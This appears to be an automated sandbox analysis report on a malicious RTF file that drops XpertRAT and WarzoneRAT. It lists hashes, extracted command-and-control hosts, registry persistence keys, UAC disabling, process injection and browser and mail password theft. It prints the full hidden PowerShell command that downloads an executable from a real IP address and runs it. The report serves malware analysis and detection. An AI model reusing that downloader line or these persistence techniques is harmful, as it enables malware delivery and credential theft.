Analysis
-
max time kernel
152s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
05-12-2020 11:47
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
Resource
win10v20201028
General
-
Target
SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
-
Size
813KB
-
MD5
03d11e6b979a69b7ebda725436ab236e
-
SHA1
98ff07105b6e3972f79d9ad872730a2a7da1063d
-
SHA256
1d0f4b56524f0e8aa3813ae9f2cdbf5a272167e28f11c3822c95d415347e5ba1
-
SHA512
99a88a180fc52a3f21d68f12d933ec32fedcbe45243a886c9448150a690d4b660ff8385c0c94290c392f37a6defc0cb54da7fe82a61eb8e0f522602591d02e70
Malware Config
Extracted
httP://192.3.194.245/xpertorigin.exe
Extracted
warzonerat
195.140.214.82:6703
Extracted
xpertrat
3.0.10
special X
zytriew.duckdns.org:4145
papertyy.duckdns.org:4145
ghytrty.duckdns.org:4145
A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1492 1844 powershell.exe WINWORD.EXE -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
XpertRAT Core Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmp xpertrat behavioral1/memory/1240-50-0x0000000000401364-mapping.dmp xpertrat behavioral1/memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmp xpertrat -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp MailPassView behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp WebBrowserPassView behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp WebBrowserPassView behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp WebBrowserPassView -
Nirsoft 11 IoCs
Processes:
resource yara_rule behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp Nirsoft behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp Nirsoft behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp Nirsoft behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp Nirsoft behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp Nirsoft behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp Nirsoft behavioral1/memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmp Nirsoft behavioral1/memory/1332-76-0x000000000040C2A8-mapping.dmp Nirsoft behavioral1/memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmp Nirsoft -
Warzone RAT Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmp warzonerat -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe" iexplore.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1492 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
xpertorigin.exe.oBHHDgvA.exepid process 1112 xpertorigin.exe 2028 .oBHHDgvA.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral1/memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral1/memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral1/memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp upx -
Loads dropped DLL 12 IoCs
Processes:
powershell.exexpertorigin.exe.oBHHDgvA.exepid process 1492 powershell.exe 1112 xpertorigin.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 112 1112 xpertorigin.exe 1112 xpertorigin.exe 1112 xpertorigin.exe 1112 xpertorigin.exe 1112 xpertorigin.exe 1112 xpertorigin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
.oBHHDgvA.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" .oBHHDgvA.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe" iexplore.exe -
Processes:
.oBHHDgvA.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" .oBHHDgvA.exe -
Modifies WinLogon 2 TTPs 4 IoCs
Processes:
xpertorigin.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList xpertorigin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts xpertorigin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\d.oirKh = "0" xpertorigin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" xpertorigin.exe -
Drops file in System32 directory 1 IoCs
Processes:
xpertorigin.exedescription ioc process File created C:\Windows\System32\rfxvmt.dll xpertorigin.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
.oBHHDgvA.exeiexplore.exedescription pid process target process PID 2028 set thread context of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 set thread context of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 set thread context of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 1240 set thread context of 584 1240 iexplore.exe iexplore.exe PID 1240 set thread context of 1228 1240 iexplore.exe iexplore.exe PID 1240 set thread context of 1328 1240 iexplore.exe iexplore.exe PID 1240 set thread context of 708 1240 iexplore.exe iexplore.exe PID 1240 set thread context of 912 1240 iexplore.exe iexplore.exe PID 1240 set thread context of 1332 1240 iexplore.exe iexplore.exe -
Drops file in Program Files directory 2 IoCs
Processes:
xpertorigin.exedescription ioc process File created C:\Program Files\Microsoft DN1\sqlmap.dll xpertorigin.exe File created C:\Program Files\Microsoft DN1\rdpwrap.ini xpertorigin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1844 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exe.oBHHDgvA.exeiexplore.exepid process 1492 powershell.exe 1492 powershell.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 2028 .oBHHDgvA.exe 708 iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WINWORD.EXEpid process 1844 WINWORD.EXE -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 112 112 112 112 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exexpertorigin.exeiexplore.exeiexplore.exedescription pid process Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1112 xpertorigin.exe Token: SeDebugPrivilege 1240 iexplore.exe Token: SeDebugPrivilege 584 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE.oBHHDgvA.exeiexplore.exepid process 1844 WINWORD.EXE 1844 WINWORD.EXE 1844 WINWORD.EXE 2028 .oBHHDgvA.exe 1240 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEpowershell.exexpertorigin.exe.oBHHDgvA.exeiexplore.exedescription pid process target process PID 1844 wrote to memory of 1492 1844 WINWORD.EXE powershell.exe PID 1844 wrote to memory of 1492 1844 WINWORD.EXE powershell.exe PID 1844 wrote to memory of 1492 1844 WINWORD.EXE powershell.exe PID 1844 wrote to memory of 1492 1844 WINWORD.EXE powershell.exe PID 1844 wrote to memory of 1652 1844 WINWORD.EXE splwow64.exe PID 1844 wrote to memory of 1652 1844 WINWORD.EXE splwow64.exe PID 1844 wrote to memory of 1652 1844 WINWORD.EXE splwow64.exe PID 1844 wrote to memory of 1652 1844 WINWORD.EXE splwow64.exe PID 1492 wrote to memory of 1112 1492 powershell.exe xpertorigin.exe PID 1492 wrote to memory of 1112 1492 powershell.exe xpertorigin.exe PID 1492 wrote to memory of 1112 1492 powershell.exe xpertorigin.exe PID 1492 wrote to memory of 1112 1492 powershell.exe xpertorigin.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 1112 wrote to memory of 2028 1112 xpertorigin.exe .oBHHDgvA.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1644 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 2024 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 2028 wrote to memory of 1240 2028 .oBHHDgvA.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe PID 1240 wrote to memory of 584 1240 iexplore.exe iexplore.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
.oBHHDgvA.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" .oBHHDgvA.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf"1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.245/xpertorigin.exe','C:\Users\Admin\AppData\Roaming\xpertorigin.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\xpertorigin.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xpertorigin.exe"C:\Users\Admin\AppData\Roaming\xpertorigin.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe"C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe5⤵
-
C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe5⤵
-
C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri0.txt"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri1.txt"6⤵
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"6⤵
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri3.txt"6⤵
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txt"6⤵
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txtMD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txtMD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\xpertorigin.exeMD5
85063571eccad2a81103ea6603ba1e08
SHA1c762c1e085a489b21c125e75e21683cd86e138c9
SHA256f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4
SHA5128a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f
-
C:\Users\Admin\AppData\Roaming\xpertorigin.exeMD5
85063571eccad2a81103ea6603ba1e08
SHA1c762c1e085a489b21c125e75e21683cd86e138c9
SHA256f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4
SHA5128a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f
-
\Program Files\Microsoft DN1\sqlmap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
\Users\Admin\AppData\Roaming\.oBHHDgvA.exeMD5
2e6f05e8245b62297355f070a6f966df
SHA17461222b5d34eb2328c7d50a75956f9dc78c32a3
SHA256f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
SHA51244302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899
-
\Users\Admin\AppData\Roaming\xpertorigin.exeMD5
85063571eccad2a81103ea6603ba1e08
SHA1c762c1e085a489b21c125e75e21683cd86e138c9
SHA256f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4
SHA5128a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f
-
memory/112-45-0x000007FEF7120000-0x000007FEF739A000-memory.dmpFilesize
2.5MB
-
memory/584-57-0x0000000000423BC0-mapping.dmp
-
memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/708-67-0x0000000000442F04-mapping.dmp
-
memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmpFilesize
356KB
-
memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmpFilesize
356KB
-
memory/912-71-0x0000000000413750-mapping.dmp
-
memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmpFilesize
1.3MB
-
memory/1112-30-0x0000000000000000-mapping.dmp
-
memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1228-62-0x0000000000411654-mapping.dmp
-
memory/1240-50-0x0000000000401364-mapping.dmp
-
memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/1328-65-0x0000000000442F04-mapping.dmp
-
memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmpFilesize
84KB
-
memory/1332-76-0x000000000040C2A8-mapping.dmp
-
memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmpFilesize
84KB
-
memory/1356-2-0x000007FEF7120000-0x000007FEF739A000-memory.dmpFilesize
2.5MB
-
memory/1492-8-0x0000000004870000-0x0000000004871000-memory.dmpFilesize
4KB
-
memory/1492-7-0x0000000004960000-0x0000000004961000-memory.dmpFilesize
4KB
-
memory/1492-26-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB
-
memory/1492-3-0x0000000000000000-mapping.dmp
-
memory/1492-18-0x0000000005800000-0x0000000005801000-memory.dmpFilesize
4KB
-
memory/1492-17-0x00000000056C0000-0x00000000056C1000-memory.dmpFilesize
4KB
-
memory/1492-12-0x0000000005650000-0x0000000005651000-memory.dmpFilesize
4KB
-
memory/1492-9-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/1492-5-0x000000006A290000-0x000000006A97E000-memory.dmpFilesize
6.9MB
-
memory/1492-25-0x0000000006280000-0x0000000006281000-memory.dmpFilesize
4KB
-
